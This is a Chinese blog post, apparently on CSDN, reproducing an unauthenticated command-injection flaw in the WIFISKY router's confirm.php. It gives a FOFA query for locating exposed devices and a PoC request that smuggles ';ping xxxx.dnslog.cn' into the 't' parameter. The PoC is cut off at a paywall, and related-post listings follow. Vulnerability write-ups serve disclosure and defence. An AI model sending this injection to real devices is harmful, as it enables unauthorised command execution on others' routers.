WIFISKY 7层流控路由器 confirm.php RCE漏洞复现

已于 2024-04-20 11:49:41 修改
阅读量687 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: 网络 安全 web安全
于 2024-04-20 11:49:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/137994904
版权

0x01 产品简介

WIFISKY-7层流控路由器是一款可用于家庭或办公环境的无线路由器,具备流控功能以优化网络流量和提供更稳定的网络连接。该路由器采用了7层流控技术,能够依据网络数据包的内容进行智能管理,从而实现对网络流量的精细化控制和优化。这种技术可以提升网络的整体性能,并且确保网络服务按照设定的规则运行,以满足不同应用和用户的需求。

0x02 漏洞概述

WIFISKY-7层流控路由器 confirm.php接口处存在命令执行漏洞,未经身份验证的远程攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。

0x03 复现环境

FOFA:app="WIFISKY-7层流控路由器"

0x04 漏洞复现

PoC

GET /notice/confirm.php?t=;ping%20xxxx.dnslog.cn HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, defla
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
订阅专栏
漏洞复现】金和OA-C6-命令执行-GetSqlData
知黑而守白
04-08 237
金和OA协同办公管理系统软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。金和OA协同办公管理系统 GetSqlData 接口存在一个命令执行漏洞,使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。
漏洞复现WIFISKY-7流控路由器-命令执行-jumper
知黑而守白
05-05 99
WIFISKY-7流控路由器是深圳市领空技术有限公司(简称“领空技术")的一款产品,深圳市领空技术有限公司是扎根深圳辐射的网络通讯设备供应商,致力于网络通讯设备产品的研究与开发。WIFISKY 7流控路由器 jumper 接口存在一个命令执行漏洞,使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。
WIFISKY-7流控路由器 后台任意命令执行漏洞复现
m0_49025459的博客
07-11 891
我们成功登录后台之后才能进行任意命令执行漏洞的操作,我们登录之后找到系统维护-系统控制台。然后我们使用命令拼接的操作来实现任意命令执行的操作。这个漏洞相当于是两个漏洞的结合,首先是弱口令漏洞
最新0day!!用友U8-Cloud UploadFile接口存在任意文件读取漏洞
weixin_43167326的博客
04-02 600
U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件读取漏洞
WIFISKY-7流控路由器confirm.php 存在RCE漏洞
wan___she__pi的博客
04-30 449
WIFISKY-7流控路由器具备流控功能以优化网络流量和提供更稳定的网络连接。该路由器采用了7流控技术,能够依据网络数据包的内容进行智能管理,从而实现对网络流量的精细化控制和优化。
wifi管理系统_WiFiSKY领空技术,集中力量为WiFi工程赋能
weixin_39627361的博客
12-12 1555
WiFiSKY领空技术,全新品牌,全新产品,全新市场,全新机遇。加入我们,一起为WIFI工程赋能!”01 WiFiSKY|领空技术深圳市领空技术有限公司,是一家着重强调技术与服务并重的新锐WIFI企业,是高通战略合作伙伴,与联发科、英特尔等半导体巨头保持信息交流互通。所有产品的研发灵感一部分来自工程一线,另一部分则来自团队出国学习深造,领空执着于技术交流与精修、服务规范化与多元化,希望在未来能...
WIFI SKY驱动
06-02
卡皇驱动 8197心片卡皇驱动 8197心片
newsina.rar_confirm_用户注册 php
09-19
新浪网 用户注册页面改版 新浪网最近希望进行用户注册页面的改版。主要要求如下:在用户注册表单中添加用户头像上传的文件域。在用户点击提交按钮之后在新的页面显示用户输入的数据及用户上传的头像,以便用户确认...
confirm.rar
02-11
在IT行业中,自定义弹窗是一种常见的用户交互设计,它能够提供更为个性化的用户体验,而“confirm.rar”文件正提供了一个基于jQuery实现的自定义确认弹窗解决方案。这个压缩包包含必要的js(JavaScript)、css(样式...
jquery-confirm.rar
08-22
<link rel="stylesheet" type="text/css" href="path/to/jquery-confirm.css"> <script src="path/to/jquery.min.js"> <script src="path/to/jquery-confirm.js"> ``` ### 2. 基本用法 `jquery-confirm`的使用非常...
jquery-confirm.js和jquery-form.js
03-21
在本主题中,我们重点关注两个特定的jQuery插件:`jquery-confirm.js`和`jquery-form.js`,它们是jQuery生态中的重要组成部分,用于增强网页的用户体验。 `jquery-confirm.js`是一个功能丰富的提示框插件,它替代了...
WiFiSKY 卡皇万能驱动
01-04
WiFiSKY 卡皇万能驱动,linux系统,MAC系统,Win7系统,WinXP_Vista系统都可以使用。 此驱动适合设备条码开头是W版的。如果不能使用,可以去官网 http://www.wifi-sky.net/找找看。
layer.confirm取消按钮绑定事件的方法
10-18
今天小编就为大家分享一篇layer.confirm取消按钮绑定事件的方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 317
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
网络安全在2024好入行吗?
最新发布
2401_84466225的博客
07-29 333
024年的今天,慎重进入网安行业吧,目前来说信息安全方向的就业对于学历的容忍度比软件开发要大得多,还有很多高中被挖过来的大佬。
第三周:网络应用(上)
Vincent_Zhang233的博客
07-26 221
一、网络应用()内容概述我们已经知道,Internet的体系结构是符合TCP/IP协议栈的,而“应用”就在这个协议的最上
S5730举例
jjjxxxhhh123的博客
07-27 941
例子: 假设在校园网络中,某些交换机之间存在多个连接(可能是多个光纤),如果没有STP,这些多个连接可能导致数据包在网络中无限制地传输,形成网络风暴,导致整个网络瘫痪。PIM-SM通过仅在需要时在网络中传输组播数据包,减少网络带宽的占用,提高数据传输效率。[sysname-GigabitEthernet0/0/1] ospf cost 10 // 设置接口的OSPF成本,影响路径选择。综上所述,这些网络技术和配置在大学校园网络中起到关键作用,确保网络运行高效、安全和可靠,同时满足用户的多样化需求。
Linux网络:传输协议TCP(二)三次挥手四次握手详解
2201_75880188的博客
07-24 1377
详细介绍了TCP协议中三次挥手四次握手的含义与原理,阐述其必要性和可靠性,以及其设计原理和在一些特定场景下TCP协议面对三次挥手四次握手出现异常时的处理机制
uniapp使用WebSocket uniapp使用WebSocket Uniapp整合WebSocket uniapp使用 websocket
半只
07-29 103
代码中的示例只在 H5、APP环境下成功运行,小程序环境下如果无效,需要使用预编译 - 条件性的编译,适配 小程序环境#ifdef H5:针对 Web H5页面。:针对原生应用(Android 和 iOS)。:针对微信小程序。:针对支付宝小程序。:针对百度小程序。:针对字节跳动小程序。:针对 QQ 小程序。:针对快手小程序。:针对京东小程序。
confirm.showinparent javascript
07-15
### 回答1: 通过使用`confirm.showinparent`方法,可以在父窗口中显示一个确认对话框。 确认对话框是一种常用的交互方式,用于询问用户是否同意或确认某个操作。在JavaScript中,可以使用`confirm()`函数来创建一个确认对话框,并返回一个布尔值表示用户的选择(是或否)。 `confirm.showinparent`方法是一种扩展的方式,它可以在父窗口中显示确认对话框而不是在当前窗口中显示。这对于通过弹出窗口或iframe嵌入的情况特别有用,可以确保用户在父窗口中的操作。 使用`confirm.showinparent`方法的语法如下: ```javascript confirm.showinparent(message); ``` 其中,`message`是一个可选的字符串参数,用于在确认对话框中显示一条消息文本。如果省略该参数,则对话框将不显示任何消息文本,仅显示默认的确认和取消按钮。 当用户选择确认按钮时,`confirm.showinparent`方法返回`true`;当用户选择取消按钮时,返回`false`。我们可以使用条件语句来根据用户的选择执行相应的操作。 总结:`confirm.showinparent`是一个在父窗口中显示确认对话框的JavaScript方法。它可以用于在弹出窗口或iframe嵌入的场景下确认用户的选择,并根据选择执行相应的操作。 ### 回答2: confirm.showinparent javascript 是一个在父窗口中显示确认对话框的 JavaScript 方法。当我们在网页中使用 JavaScript,有时候需要显示一个确认对话框,以便用户确认或取消某个操作。confirm.showinparent() 方法就可以满足这个需求。 通常情况下,我们使用 confirm() 方法来显示确认对话框,该对话框会在当前窗口中打开。但有时候,我们希望确认对话框显示在父窗口中,而不是当前窗口。这时,confirm.showinparent() 方法就可以派上用场了。 使用 confirm.showinparent() 方法,我们可以在 JavaScript 代码中调用该方法,并传入提示消息作为参数。这样,就会在父窗口中显示一个确认对话框,要求用户点击确认或取消按钮。 这个方法的使用场景可能是当我们需要在嵌入的框架中显示确认对话框时。比如,当我们在一个网页中嵌入了一个广告或其他内容,并希望在用户点击相关元素时,通过确认对话框确认用户的意图。通过使用 confirm.showinparent() 方法,我们就可以在父窗口中显示这个确认对话框,而不是在当前窗口中。 总的来说,confirm.showinparent javascript 方法是为了在父窗口中显示确认对话框而存在的。使用该方法,我们可以在 JavaScript 中调用该函数,并传入相应的参数,以在父窗口中显示确认对话框。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值